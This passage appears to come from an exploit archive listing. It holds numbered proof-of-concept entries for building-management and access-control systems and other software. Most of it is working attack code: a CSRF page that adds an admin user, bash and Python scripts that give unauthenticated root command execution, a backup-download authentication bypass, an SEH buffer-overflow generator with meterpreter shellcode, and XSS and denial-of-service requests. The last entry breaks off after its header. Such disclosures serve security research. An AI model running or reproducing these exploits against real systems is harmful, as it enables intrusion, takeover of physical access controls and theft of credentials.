     # Advisory: https://applied-risk.com/resources/ar-2019-008
     # Paper: https://applied-risk.com/resources/i-own-your-building-management-system
     # CVE: CVE-2019-7273

     # Optergy Proton/Enterprise BMS CSRF Add Admin

     <!-- CSRF Add Admin Exploit -->
     <html>
       <body>
       <script>history.pushState('', '', '/')</script>
         <form action="http://192.168.232.19/controlPanel/ajax/UserManipulation.html?add" method="POST">
           <input type="hidden" name="user.accountEnabled" value="true" />
           <input type="hidden" name="user.username" value="testingus" />
           <input type="hidden" name="user.password" value="testingus" />
           <input type="hidden" name="confirmPassword" value="testingus" />
           <input type="hidden" name="user.firstname" value="Tester" />
           <input type="hidden" name="user.lastname" value="Testovski" />
           <input type="hidden" name="user.companyName" value="TEST Inc." />
           <input type="hidden" name="user.address" value="TestStr 17-251" />
           <input type="hidden" name="user.emailAddress" value="[email protected]" />
           <input type="hidden" name="user.departmentId" value="" />
           <input type="hidden" name="user.phoneNumber" value="1112223333" />
           <input type="hidden" name="user.mobileNumber" value="1233211234" />
           <input type="hidden" name="securityLevel" value="10" />
           <input type="hidden" name="user.showBanner" value="true" />
           <input type="hidden" name="user.showMenu" value="true" />
           <input type="hidden" name="user.showAlarmTab" value="true" />
           <input type="hidden" name="user.visibleAlarms" value="0" />
           <input type="hidden" name="user.showBookmarks" value="true" />
           <input type="hidden" name="user.showNotificationTab" value="true" />
           <input type="hidden" name="user.autoDismissFeedback" value="true" />
           <input type="hidden" name="user.canChangeBookmarks" value="true" />
           <input type="hidden" name="user.canChangePassword" value="true" />
           <input type="hidden" name="user.canUpdateProfile" value="true" />
           <input type="hidden" name="homepage-text" value="" />
           <input type="hidden" name="user.homePageType" value="" />
           <input type="hidden" name="user.homePage" value="" />
           <input type="hidden" name="background" value="" />
           <input type="hidden" name="user.backgroundImage-text" value="" />
           <input type="hidden" name="user.backgroundImage" value="" />
           <input type="hidden" name="user.backgroundTiled" value="" />
           <input type="hidden" name="user.backgroundColour" value="" />
           <input type="hidden" name="newMemberships" value="1" />
           <input type="hidden" name="user.id" value="" />
           <input type="hidden" name="_sourcePage" value="/WEB-INF/jsp/controlPanel/UserAdministration.jsp" />
           <input type="hidden" name="__fp" value="user.showBookmarks||user.showNotificationTab||user.emailSystemNotifications||user.addToSiteDirectory||user.showMenu||user.departmentId||user.showAlarmTab||user.smsAlarms||user.showBanner||accountExpires||user.autoDismissFeedback||user.changePasswordOnNextLogin||passwordExpires||user.showUserProfile||user.canUpdateProfile||user.canChangePassword||user.canChangeBookmarks||user.accountEnabled||" />
           <input type="hidden" name="newPrivileges" value="7" />
           <input type="hidden" name="newPrivileges" value="9" />
           <input type="hidden" name="newPrivileges" value="8" />
           <input type="hidden" name="newPrivileges" value="10" />
           <input type="hidden" name="newPrivileges" value="13" />
           <input type="hidden" name="newPrivileges" value="14" />
           <input type="hidden" name="newPrivileges" value="12" />
           <input type="hidden" name="newPrivileges" value="2" />
           <input type="hidden" name="newPrivileges" value="3" />
           <input type="hidden" name="newPrivileges" value="4" />
           <input type="hidden" name="newPrivileges" value="139" />
           <input type="hidden" name="newPrivileges" value="138" />
           <input type="hidden" name="newPrivileges" value="141" />
           <input type="hidden" name="newPrivileges" value="140" />
           <input type="hidden" name="newPrivileges" value="124" />
           <input type="hidden" name="newPrivileges" value="128" />
           <input type="hidden" name="newPrivileges" value="119" />
           <input type="hidden" name="newPrivileges" value="19" />
           <input type="hidden" name="newPrivileges" value="17" />
           <input type="hidden" name="newPrivileges" value="18" />
           <input type="hidden" name="newPrivileges" value="20" />
           <input type="hidden" name="newPrivileges" value="21" />
           <input type="hidden" name="newPrivileges" value="24" />
           <input type="hidden" name="newPrivileges" value="23" />
           <input type="hidden" name="newPrivileges" value="132" />
           <input type="hidden" name="newPrivileges" value="131" />
           <input type="hidden" name="newPrivileges" value="134" />
           <input type="hidden" name="newPrivileges" value="147" />
           <input type="hidden" name="newPrivileges" value="25" />
           <input type="hidden" name="newPrivileges" value="135" />
           <input type="hidden" name="newPrivileges" value="105" />
           <input type="hidden" name="newPrivileges" value="59" />
           <input type="hidden" name="newPrivileges" value="142" />
           <input type="hidden" name="newPrivileges" value="28" />
           <input type="hidden" name="newPrivileges" value="27" />
           <input type="hidden" name="newPrivileges" value="102" />
           <input type="hidden" name="newPrivileges" value="31" />
           <input type="hidden" name="newPrivileges" value="125" />
           <input type="hidden" name="newPrivileges" value="30" />
           <input type="hidden" name="newPrivileges" value="108" />
           <input type="hidden" name="newPrivileges" value="129" />
           <input type="hidden" name="newPrivileges" value="33" />
           <input type="hidden" name="newPrivileges" value="34" />
           <input type="hidden" name="newPrivileges" value="36" />
           <input type="hidden" name="newPrivileges" value="37" />
           <input type="hidden" name="newPrivileges" value="38" />
           <input type="hidden" name="newPrivileges" value="46" />
           <input type="hidden" name="newPrivileges" value="127" />
           <input type="hidden" name="newPrivileges" value="41" />
           <input type="hidden" name="newPrivileges" value="42" />
           <input type="hidden" name="newPrivileges" value="45" />
           <input type="hidden" name="newPrivileges" value="44" />
           <input type="hidden" name="newPrivileges" value="49" />
           <input type="hidden" name="newPrivileges" value="48" />
           <input type="hidden" name="newPrivileges" value="112" />
           <input type="hidden" name="newPrivileges" value="113" />
           <input type="hidden" name="newPrivileges" value="117" />
           <input type="hidden" name="newPrivileges" value="115" />
           <input type="hidden" name="newPrivileges" value="116" />
           <input type="hidden" name="newPrivileges" value="133" />
           <input type="hidden" name="newPrivileges" value="51" />
           <input type="hidden" name="newPrivileges" value="54" />
           <input type="hidden" name="newPrivileges" value="56" />
           <input type="hidden" name="newPrivileges" value="55" />
           <input type="hidden" name="newPrivileges" value="66" />
           <input type="hidden" name="newPrivileges" value="67" />
           <input type="hidden" name="newPrivileges" value="60" />
           <input type="hidden" name="newPrivileges" value="61" />
           <input type="hidden" name="newPrivileges" value="62" />
           <input type="hidden" name="newPrivileges" value="68" />
           <input type="hidden" name="newPrivileges" value="69" />
           <input type="hidden" name="newPrivileges" value="103" />
           <input type="hidden" name="newPrivileges" value="104" />
           <input type="hidden" name="newPrivileges" value="64" />
           <input type="hidden" name="newPrivileges" value="65" />
           <input type="hidden" name="newPrivileges" value="71" />
           <input type="hidden" name="newPrivileges" value="121" />
           <input type="hidden" name="newPrivileges" value="122" />
           <input type="hidden" name="newPrivileges" value="85" />
           <input type="hidden" name="newPrivileges" value="86" />
           <input type="hidden" name="newPrivileges" value="74" />
           <input type="hidden" name="newPrivileges" value="76" />
           <input type="hidden" name="newPrivileges" value="144" />
           <input type="hidden" name="newPrivileges" value="75" />
           <input type="hidden" name="newPrivileges" value="77" />
           <input type="hidden" name="newPrivileges" value="78" />
           <input type="hidden" name="newPrivileges" value="79" />
           <input type="hidden" name="newPrivileges" value="73" />
           <input type="hidden" name="newPrivileges" value="143" />
           <input type="hidden" name="newPrivileges" value="109" />
           <input type="hidden" name="newPrivileges" value="110" />
           <input type="hidden" name="newPrivileges" value="88" />
           <input type="hidden" name="newPrivileges" value="89" />
           <input type="hidden" name="newPrivileges" value="90" />
           <input type="hidden" name="newPrivileges" value="118" />
           <input type="hidden" name="newPrivileges" value="95" />
           <input type="hidden" name="newPrivileges" value="93" />
           <input type="hidden" name="newPrivileges" value="96" />
           <input type="hidden" name="newPrivileges" value="94" />
           <input type="hidden" name="newPrivileges" value="92" />
           <input type="hidden" name="newPrivileges" value="98" />
           <input type="hidden" name="newPrivileges" value="99" />
           <input type="hidden" name="newPrivileges" value="146" />
           <input type="hidden" name="newPrivileges" value="100" />
           <input type="submit" value="Forgery" />
         </form>
       </body>
     </html>
  7. # Exploit Title: FlexAir Access Control 2.4.9api3 - Remote Code Execution
# Google Dork: NA
# Date: 2019-11-11
# Exploit Author: LiquidWorm
# Vendor Homepage: https://www.computrols.com/capabilities-cbas-web/
# Software Link: https://www.computrols.com/building-automation-software/
# Version: 2.4.9api3
# Tested on: NA
# CVE : CVE-2019-9189
# Advisory: https://applied-risk.com/resources/ar-2019-007
# Paper: https://applied-risk.com/resources/i-own-your-building-management-system

# PoC

#!/bin/bash
#
# Command injection with root privileges in FlexAir Access Control (Prima Systems)
# Firmware version: <= 2.3.38
#
# Discovered by Sipke Mellema
# Updated: 14.01.2019
#
##########################################################################
#
# $ ./Nova2.3.38_cmd.sh 192.168.13.37 "id"
# Executing: id
# Output:
# uid=0(root) gid=0(root) groups=0(root),10(wheel)
# Removing temporary file..
# Done
#
##########################################################################

# Output file on the server
OUTPUT_FILE="/www/pages/app/images/logos/output.txt"

# Command to execute
CMD="$2"

# IP address
IP="$1"

# Change HTTP to HTTPS if required
HOST="http://${IP}"

# Add output file
CMD_FULL="${CMD}>${OUTPUT_FILE}"

# Command injection payload. Be careful with single quotes!
PAYLOAD="<requests><request name='LoginUser'><param name='UsrName' value='test'/><param name='UsrEMail' value='[email protected]'/><param name='GoogleAccessToken' value='test;${CMD_FULL}'/></request></requests>"

# Perform exploit
echo "Executing: ${CMD}"
curl --silent --output /dev/null -X POST -d "${PAYLOAD}" "${HOST}/bin/sysfcgi.fx"

# Get output
echo "Output:"
curl -s "${HOST}/app/images/logos/output.txt"

# Remove temp file
echo "Removing temporary file.."
PAYLOAD="<requests><request name='LoginUser'><param name='UsrName' value='test'/><param name='UsrEMail' value='[email protected]'/><param name='GoogleAccessToken' value='test;rm /www/pages/app/images/logos/output.txt'/></request></requests>"
curl --silent --output /dev/null -X POST -d "${PAYLOAD}" "${HOST}/bin/sysfcgi.fx"
echo "Done"
  8. # Title: Optergy 2.3.0a - Username Disclosure
# Author: LiquidWorm
# Date: 2019-11-05
# Vendor: https://optergy.com/
# Product web page: https://optergy.com/products/
# Affected version: <=2.3.0a
# Advisory: https://applied-risk.com/resources/ar-2019-008
# Paper: https://applied-risk.com/resources/i-own-your-building-management-system
# CVE: CVE-2019-7272

# PoC:

curl -s http://192.168.232.19/Login.html?showReset=true | grep 'option value='

<option value="80">djuro</option>
<option value="99">teppi</option>
<option value="67">view</option>
<option value="3">alerton</option>
<option value="59">stef</option>
<option value="41">humba</option>
<option value="25">drmio</option>
<option value="11">de3</option>
<option value="56">andri</option>
<option value="6">myko</option>
<option value="22">dzonka</option>
<option value="76">kosto</option>
<option value="8">beebee</option>
<option value="1">Administrator</option>
  9. # Exploit Title: RTK IIS Codec Service 6.4.10041.133 - 'RtkI2SCodec' Unquoted Service Path
# Google Dork: N/A
# Date: 2019-11-11
# Exploit Author: chuyreds
# Vendor Homepage: https://www.realtek.com/en/
# Software Link: https://support.hp.com/mx-es/drivers/selfservice/hp-spectre-13-4000-x360-convertible-pc/7527520/model/7835502?sku=K8N38LA
# Version: 6.4.10041.133
# Tested on: Windows 10 Home Single Language
# CVE : N/A

# Explot-Realtek.txt

#Service Info:

C:\Users\user>wmic service get name, displayname, pathname, startmode | findstr /i "auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """
RTK IIS Codec Service    RtkI2SCodec    C:\Program Files\Realtek\Audio\IIS\RtkI2SAudioService64.exe    Auto

C:\Users\user>sc query RtkI2SCodec

NOMBRE_SERVICIO: RtkI2SCodec
        TIPO               : 10  WIN32_OWN_PROCESS
        ESTADO             : 4  RUNNING
                                (STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN)
        CÓD_SALIDA_WIN32   : 0  (0x0)
        CÓD_SALIDA_SERVICIO: 0  (0x0)
        PUNTO_COMPROB.     : 0x0
        INDICACIÓN_INICIO  : 0x0
  10. # Title: Optergy 2.3.0a - Remote Code Execution
# Author: LiquidWorm
# Date: 2019-11-05
# Vendor: https://optergy.com/
# Product web page: https://optergy.com/products/
# Affected version: <=2.3.0a
# Advisory: https://applied-risk.com/resources/ar-2019-008
# Paper: https://applied-risk.com/resources/i-own-your-building-management-system
# CVE: CVE-2019-7276

# PoC:

#!/usr/bin/env python
#
# Unauthenticated Remote Root Exploit in Optergy BMS (Console Backdoor)
#
# Affected version <=2.0.3a (Proton and Enterprise)
#
##############################################################################
#
# lqwrm@metalgear:~/stuff/optergy$ python getroot.py 192.168.232.19
# Challenge received: 1547540929287
# SHA1: 56a6e5bf103591ed45faa2159cae234d04f06d93
# MD5 from SHA1: 873efc9ca9171d575623a99aeda44e31
# Answer: 56a6e5bf103591ed45faa2159cae234d04f06d93873efc9ca9171d575623a99aeda44e31
#
# id
# uid=0(root) gid=0(root) groups=0(root)
#
##############################################################################
#
#

import os#######
import sys######
import json#####
import hashlib##
import requests#

piton = os.path.basename(sys.argv[0])

if len(sys.argv) < 2:
    print '\n\x20\x20[*] Usage: '+piton+' <ip:port>\n'
    sys.exit()

while True:
    challenge_url = 'http://'+sys.argv[1]+'/tools/ajax/ConsoleResult.html?get'
    try:
        req1 = requests.get(challenge_url)
        get_challenge = json.loads(req1.text)
        challenge = get_challenge['response']['message']
        print 'Challenge received: ' + challenge
        hash_object = hashlib.sha1(challenge.encode())
        print 'SHA1: '+(hash_object.hexdigest())
        h1 = (hash_object.hexdigest())
        hash_object = hashlib.md5(h1.encode())
        print 'MD5 from SHA1: '+(hash_object.hexdigest())
        h2 = (hash_object.hexdigest())
        print 'Answer: '+h1+h2
        zeTargets = 'http://'+sys.argv[1]+'/tools/ajax/ConsoleResult.html'
        zeCommand = raw_input('# ')
        if zeCommand.strip() == 'exit':
            sys.exit()
        zeHeaders = {'User-Agent' : 'BB/BMS-251.4ev4h',
                     'Accept' : '*/*',
                     'Accept-Encoding' : 'gzip, deflate',
                     'Accept-Language' : 'mk-MK,mk;q=1.7',
                     'Connection' : 'keep-alive',
                     'Connection-Type' : 'application/x-www-form-urlencoded'}
        zePardata = {'command' : 'sudo '+zeCommand,
                     'challenge' : challenge,
                     'answer' : h1+h2}
        zeRequest = requests.post(zeTargets, headers=zeHeaders, data=zePardata)
        get_resp = json.loads(zeRequest.text)
        get_answ = get_resp['response']['message']
        print get_answ
    except Exception:
        print '[*] Error!'
        break
  11. # Exploit Title: Adrenalin Core HCM 5.4.0 - 'ReportID' Reflected Cross-Site Scripting
# Google Dork: NA
# Date: 2018-09-06
# Exploit Author: Rishu Ranjan
# Vendor Homepage: https://www.myadrenalin.com/
# Software Link: https://www.myadrenalin.com/core-hcm/
# Version: 5.4.0 (REQUIRED)
# Tested on: NA
# CVE : CVE-2018-12653
# Type: webapps
# Platform: Multiple

# Description
# ====================
# A Reflected Cross Site Scripting (XSS) Vulnerability was discovered in
# Adrenalin Core HCM v5.4.0 HRMS Software. The user supplied input containing
# malicious JavaScript is echoed back as it is in JavaScript code in an HTML
# response.

URL
====================
https://<HOST:PORT>/myadrenalin/RPT/SSRSDynamicEditReports.aspx?ReportId=109LWFREPORT.RDL15822%27%3balert(%22Reflected%20XSS%22)%2f%2f773&Export=0

Parameter
====================
ReportId

Attack Type
====================
Remote

CVE Impact Other
====================
Allows an attacker to inject malicious JavaScript which can steal cookies, redirect users to other malicious websites, etc.

Reference
====================
https://nvd.nist.gov/vuln/detail/CVE-2018-12653
https://www.knowcybersec.com/2019/02/CVE-2018-12653-reflected-XSS.html

Discoverer
====================
Rishu Ranjan
  12. # Exploit Title: FlexAir Access Control 2.3.35 - Authentication Bypass
# Google Dork: NA
# Date: 2019-11-11
# Exploit Author: LiquidWorm
# Vendor Homepage: https://www.computrols.com/capabilities-cbas-web/
# Software Link: https://www.computrols.com/building-automation-software/
# Version: 2.3.35
# Tested on: NA
# CVE : CVE-2019-7666, CVE-2019-7667
# Advisory: https://applied-risk.com/resources/ar-2019-007
# Paper: https://applied-risk.com/resources/i-own-your-building-management-system

#!/usr/bin/env python
# -*- coding: utf8 -*-
#
# Prima FlexAir Access Control 2.3.35 Database Backup Predictable Name Exploit
# Authentication Bypass (Login with MD5 hash)
#
# Older versions: /links/Nova_Config_2019-01-03.bck
# Older versions: /Nova/assets/Nova_Config_2019-01-03.bck
# Newer versions: /links/Nova_Config_2019-01-03_13-53.pdb3
# Fixed versions: 2.4
#
###################################################################################
#
# lqwrm@metalgear:~/stuff/prima$ python exploitDB.py http://192.168.230.17:8080
# [+] Please wait while fetching the backup config file...
# [+] Found some juice!
# [+] Downloading: http://192.168.230.17:8080/links/Nova_Config_2019-01-07.bck
# [+] Saved as: Nova_Config_2019-01-07.bck-105625.db
# lqwrm@metalgear:~/stuff/prima$ sqlite3 Nova_Config_2019-01-07.bck-105625.db
# SQLite version 3.22.0 2018-01-22 18:45:57
# Enter ".help" for usage hints.
# sqlite> select usrloginname,usrloginpassword from users where usrid in (1,2);
# superadmin|0dfcfa8cc7fd39d96ffe22dd406b5065
# sysadmin|1af01c4a5a4ec37f451a9feb20a0bbbe
# sqlite> .q
# lqwrm@metalgear:~/stuff/prima$
#
###################################################################################
#
# 11.01.2019
#

import os#######
import sys######
import time#####
import requests#
from datetime import timedelta, date
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

piton = os.path.basename(sys.argv[0])

if len(sys.argv) < 2:
    print '[+] Usage: '+piton+' [target]'
    print '[+] Target example 1: http://10.0.0.17:8080'
    print '[+] Target example 2: https://primanova.tld\n'
    sys.exit()

host = sys.argv[1]

# Yield every date in [start_date, end_date); the backup name embeds the date it was taken
def datum(start_date, end_date):
    for n in range(int ((end_date - start_date).days)):
        yield start_date + timedelta(n)

start_date = date(2017, 1, 1)
end_date = date(2019, 12, 30)

print '[+] Please wait while fetching the backup config file...'

def spinning_cursor():
    while True:
        for cursor in '|/-\\':
            yield cursor

spinner = spinning_cursor()

for mooshoo in datum(start_date, end_date):
    sys.stdout.write(next(spinner))
    sys.stdout.flush()
    time.sleep(0.1)
    sys.stdout.write('\b')
    h = requests.get(host+'/links/Nova_Config_'+mooshoo.strftime('%Y-%m-%d')+'.bck', verify=False)
    if (h.status_code) == 200:
        print '[+] Found some juice!'
        print '[+] Downloading: '+host+'/links/Nova_Config_'+mooshoo.strftime('%Y-%m-%d')+'.bck'
        timestr = time.strftime('%H%M%S')
        time.sleep(1)
        open('Nova_Config_'+mooshoo.strftime('%Y-%m-%d')+'.bck-'+timestr+'.db', 'wb').write(h.content)
        print '[+] Saved as: Nova_Config_'+mooshoo.strftime('%Y-%m-%d')+'.bck-'+timestr+'.db'
        sys.exit()

print '[-] No backup for you today. :('
  13. # Exploit Title: Control Center PRO 6.2.9 - Local Stack Based BufferOverflow (SEH)
# Date: 2019-11-09
# Exploit Author: Samir sanchez garnica @sasaga92
# Vendor Homepage: http://www.webgateinc.com/wgi/eng/products/list.php?ec_idx1=P610
# Software Link: http://www.webgateinc.com/wgi/eng/products/list.php?ec_idx1=P610&ptype=view&page=&p_idx=90&tab=download&#tabdown
# Version: 6.2.9
# Tested: Windows 10 pro N and Windows XP SP3
# CVE : N/A

#!/usr/bin/python
'''
A stack overflow vulnerability exists: when the "create user" module is used and a
considerable number of characters is pasted into the username field, the software
does not bound the input and the SEH record is overwritten.
'''

import sys
import random
import string
import struct
import argparse

def pattern_create(_type,_length):
    _type = _type.split(" ")
    if _type[0] == "trash":
        return _type[1] * _length
    elif _type[0] == "random":
        return ''.join(random.choice(string.lowercase) for i in range(_length))
    elif _type[0] == "pattern":
        _pattern = ''
        _parts = ['A', 'a', '0']
        while len(_pattern) != _length:
            _pattern += _parts[len(_pattern) % 3]
            if len(_pattern) % 3 == 0:
                _parts[2] = chr(ord(_parts[2]) + 1)
                if _parts[2] > '9':
                    _parts[2] = '0'
                    _parts[1] = chr(ord(_parts[1]) + 1)
                    if _parts[1] > 'z':
                        _parts[1] = 'a'
                        _parts[0] = chr(ord(_parts[0]) + 1)
                        if _parts[0] > 'Z':
                            _parts[0] = 'A'
        return _pattern
    else:
        return "Not Found"

def generate_file(_name_file, _payload):
    print _payload
    print "[+] Creando Archivo malicioso"
    _name_file = open(_name_file,"w+")
    _name_file.write(_payload)
    _name_file.close()
    print "[+] Payload de {0} bytes generado, exitosamente.".format(len(_payload))

def main():
    _parser = argparse.ArgumentParser()
    _parser.add_argument("--os", dest="os", help="introduce el os, win10, winxp", required=True)
    _args = _parser.parse_args()

    #badchars 0x0a, 0x0d, >= 0x80
    _name_exploit = "ControlCenterPRO_v6_2_9.txt"

    #sudo ./msfvenom -p windows/meterpreter/bind_tcp LPORT=4444 -e x86/alpha_mixed EXITFUNC=seh -f c -b '\x00\x0a\x0d' BufferRegister=ESP
    _shellcode = ("\x54\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
    "\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b"
    "\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58"
    "\x50\x38\x41\x42\x75\x4a\x49\x79\x6c\x69\x78\x4e\x62\x37\x70"
    "\x43\x30\x45\x50\x31\x70\x6f\x79\x4d\x35\x46\x51\x6f\x30\x50"
    "\x64\x4e\x6b\x72\x70\x50\x30\x4e\x6b\x46\x32\x64\x4c\x6e\x6b"
    "\x71\x42\x32\x34\x6c\x4b\x61\x62\x34\x68\x66\x6f\x6e\x57\x30"
    "\x4a\x76\x46\x76\x51\x49\x6f\x4e\x4c\x47\x4c\x63\x51\x63\x4c"
    "\x75\x52\x76\x4c\x35\x70\x49\x51\x58\x4f\x54\x4d\x75\x51\x4b"
    "\x77\x6b\x52\x39\x62\x46\x32\x53\x67\x4c\x4b\x50\x52\x76\x70"
    "\x4c\x4b\x71\x5a\x77\x4c\x6e\x6b\x42\x6c\x46\x71\x32\x58\x6a"
    "\x43\x61\x58\x56\x61\x68\x51\x76\x31\x4c\x4b\x73\x69\x55\x70"
    "\x57\x71\x4b\x63\x4e\x6b\x67\x39\x66\x78\x6d\x33\x56\x5a\x32"
    "\x69\x6c\x4b\x35\x64\x4c\x4b\x55\x51\x6a\x76\x50\x31\x59\x6f"
    "\x4c\x6c\x39\x51\x58\x4f\x64\x4d\x35\x51\x5a\x67\x54\x78\x79"
    "\x70\x53\x45\x5a\x56\x67\x73\x71\x6d\x49\x68\x45\x6b\x73\x4d"
    "\x31\x34\x63\x45\x68\x64\x51\x48\x4c\x4b\x70\x58\x44\x64\x37"
    "\x71\x49\x43\x72\x46\x4c\x4b\x36\x6c\x52\x6b\x4e\x6b\x30\x58"
    "\x77\x6c\x36\x61\x4a\x73\x4e\x6b\x77\x74\x4c\x4b\x56\x61\x7a"
    "\x70\x6e\x69\x42\x64\x45\x74\x71\x34\x63\x6b\x61\x4b\x51\x71"
    "\x52\x79\x52\x7a\x72\x71\x39\x6f\x39\x70\x73\x6f\x51\x4f\x73"
    "\x6a\x4e\x6b\x64\x52\x58\x6b\x6c\x4d\x73\x6d\x61\x78\x55\x63"
    "\x77\x42\x55\x50\x67\x70\x42\x48\x73\x47\x54\x33\x36\x52\x63"
    "\x6f\x46\x34\x73\x58\x52\x6c\x63\x47\x44\x66\x56\x67\x69\x6f"
    "\x48\x55\x6d\x68\x5a\x30\x45\x51\x77\x70\x37\x70\x75\x79\x58"
    "\x44\x70\x54\x42\x70\x53\x58\x44\x69\x4f\x70\x30\x6b\x57\x70"
    "\x39\x6f\x5a\x75\x42\x4a\x34\x4b\x42\x79\x52\x70\x4d\x32\x39"
    "\x6d\x62\x4a\x46\x61\x32\x4a\x37\x72\x32\x48\x69\x7a\x66\x6f"
    "\x69\x4f\x39\x70\x4b\x4f\x4b\x65\x4e\x77\x30\x68\x47\x72\x63"
    "\x30\x52\x31\x33\x6c\x4e\x69\x7a\x46\x61\x7a\x56\x70\x61\x46"
    "\x30\x57\x75\x38\x6b\x72\x69\x4b\x44\x77\x73\x57\x79\x6f\x69"
    "\x45\x4d\x55\x6b\x70\x63\x45\x46\x38\x52\x77\x50\x68\x38\x37"
    "\x48\x69\x45\x68\x4b\x4f\x69\x6f\x59\x45\x46\x37\x52\x48\x71"
    "\x64\x68\x6c\x67\x4b\x39\x71\x59\x6f\x6a\x75\x52\x77\x6e\x77"
    "\x45\x38\x63\x45\x32\x4e\x42\x6d\x30\x61\x59\x6f\x4e\x35\x31"
    "\x7a\x35\x50\x30\x6a\x46\x64\x50\x56\x52\x77\x61\x78\x47\x72"
    "\x58\x59\x59\x58\x53\x6f\x39\x6f\x49\x45\x6b\x33\x48\x78\x63"
    "\x30\x73\x4e\x64\x6d\x4c\x4b\x56\x56\x53\x5a\x53\x70\x75\x38"
    "\x77\x70\x52\x30\x63\x30\x45\x50\x33\x66\x50\x6a\x53\x30\x51"
    "\x78\x70\x58\x79\x34\x31\x43\x4a\x45\x79\x6f\x4e\x35\x4e\x73"
    "\x56\x33\x51\x7a\x67\x70\x43\x66\x61\x43\x56\x37\x75\x38\x35"
    "\x52\x79\x49\x48\x48\x71\x4f\x4b\x4f\x7a\x75\x6e\x63\x6b\x48"
    "\x77\x70\x51\x6e\x76\x67\x36\x61\x39\x53\x74\x69\x6b\x76\x44"
    "\x35\x78\x69\x7a\x63\x6f\x4b\x59\x6e\x76\x6e\x30\x32\x6b\x5a"
    "\x61\x7a\x33\x30\x56\x33\x39\x6f\x78\x55\x63\x5a\x65\x50\x79"
    "\x53\x41\x41")

    _offset = 664
    _padding = 40000
    _nseh = "\x42\x42\x77\x08"
    _seh = struct.pack("<L", 0x637c1571) #0x0258107E pop edi # pop esi # retn lib_VoiceEngine_dll32.dll 3 8 one-reg, stack edi, esi nonull, ascii

    if _args.os.lower() == "win10":
        _esp_prepend = "\x54\x58\x66\x05\x34\x18\x50\x5C"
        _inject = pattern_create("trash A",_offset)
        _inject += _nseh
        _inject += _seh
        _inject += "A" * 4
        _inject += _esp_prepend
        _inject += _shellcode
        _inject += pattern_create("trash D",_padding-len(_inject))
    elif _args.os.lower() == "winxp":
        _esp_prepend = "\x54\x58\x66\x05\x7C\x0C\x50\x5C"
        _inject = pattern_create("trash A",_offset)
        _inject += _nseh
        _inject += _seh
        _inject += "A" * 4
        _inject += _esp_prepend
        _inject += "A" * 16
        _inject += _shellcode
        _inject += pattern_create("trash D",_padding-len(_inject))
    else:
        print("[-] os select is not support, select win10 or winxp")
        # no payload was built for this OS, so stop before generate_file() dereferences _inject
        sys.exit(1)

    generate_file(_name_exploit, _inject)

if __name__ == "__main__":
    main()
  14. # Exploit Title: Wondershare Application Framework Service - "WsAppService" Unquoted Service Path
# Google Dork: N/A
# Date: 2019-11-11
# Exploit Author: chuyreds
# Vendor Homepage: https://www.wondershare.com/
# Software Link: https://www.wondershare.com/drfone/
# Version: 2.4.3.231
# Tested on: Windows 10 Home Single Language
# CVE : N/A

#Service Info:

C:\Users\user>wmic service get name, displayname, pathname, startmode | findstr /i "auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """
Wondershare Application Framework Service    WsAppService    C:\Program Files (x86)\Wondershare\WAF\2.4.3.231\WsAppService.exe    Auto

C:\Users\user>sc query WsAppService

NOMBRE_SERVICIO: WsAppService
        TIPO               : 10  WIN32_OWN_PROCESS
        ESTADO             : 4  RUNNING
                                (STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN)
        CÓD_SALIDA_WIN32   : 0  (0x0)
        CÓD_SALIDA_SERVICIO: 0  (0x0)
        PUNTO_COMPROB.     : 0x0
        INDICACIÓN_INICIO  : 0x0
  15. # Exploit Title: Bematech Printer MP-4200 - Denial of Service
# Date: 2019-11-11
# Exploit Author: Jonatas Fil
# Vendor Homepage: https://www.bematech.com.br/
# Software Link: https://www.bematech.com.br/produto/mp-4200-th/
# Version: MP-4200 TH
# Tested on: Windows and Linux
# CVE : N/A

DoS Poc:
--------------------------------------------------------------------------------------------------------
POST /en/conf_admin.html HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.75 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9,pt;q=0.8
Cache-Control: max-age=0
Referer: http://TARGET/en/conf_admin.html
Content-Length: 40
Content-Type: application/x-www-form-urlencoded

admin=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa&person=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa&SUBMIT_ADMIN=Submit
--------------------------------------------------------------------------------------------------------

XSS Poc:
--------------------------------------------------------------------------------------------------------
POST /en/conf_admin.html HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.75 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9,pt;q=0.8
Cache-Control: max-age=0
Referer: http://printer.com/en/conf_admin.html
Content-Length: 40
Content-Type: application/x-www-form-urlencoded

admin=%3C%2Ftd%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&person=%3C%2Ftd%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&SUBMIT_ADMIN=Submit
  16. # Title: Linear eMerge E3 1.00-06 - Remote Code Execution
# Author: LiquidWorm
# Date: 2019-11-13
# Vendor Homepage: http://linear-solutions.com/nsc_family/e3-series/
# Software Link: http://linear-solutions.com/nsc_family/e3-series/
# Affected version: <=2.3.0a
# Advisory: https://applied-risk.com/resources/ar-2019-005
# Paper: https://applied-risk.com/resources/i-own-your-building-management-system
# CVE: CVE-2019-7256

#!/usr/bin/env python
#
# Linear eMerge E3 Unauthenticated Command Injection Remote Root Exploit
# Affected version: <=1.00-06
# via card_scan_decoder.php
# CVE: CVE-2019-7256
# Advisory: https://applied-risk.com/resources/ar-2019-005
# Paper: https://applied-risk.com/resources/i-own-your-building-management-system
#
# By Gjoko 'LiquidWorm' Krstic
#
#########################################################################
